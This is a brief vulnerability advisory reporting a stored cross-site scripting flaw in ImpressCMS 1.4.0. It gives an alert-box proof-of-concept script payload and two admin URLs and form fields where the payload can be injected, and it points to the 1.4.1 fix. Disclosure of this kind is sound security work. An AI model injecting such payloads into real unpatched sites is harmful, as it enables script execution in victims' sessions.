#Author: AppleBois
#Homepage: https://sourceforge.net/projects/impresscms/
#Affected Version: 1.4.0
#Stored XSS
#Allows an attacker to execute arbitrary HTML and JavaScript code
#Solution: Update to 1.4.1 
#More information : https://github.com/ImpressCMS/impresscms/issues/659

Payload = <script>alert('AppleBois');</script>

Vulnerable URL :modules/system/admin.php?fct=adsense&op=mod&adsenseid=4
Vulnerable TextBar : ID of the [adsense tag to display this ad]

Vulnerable URL :/modules/system/admin.php?fct=customtag&op=mod
Vulnerable TextBar : Name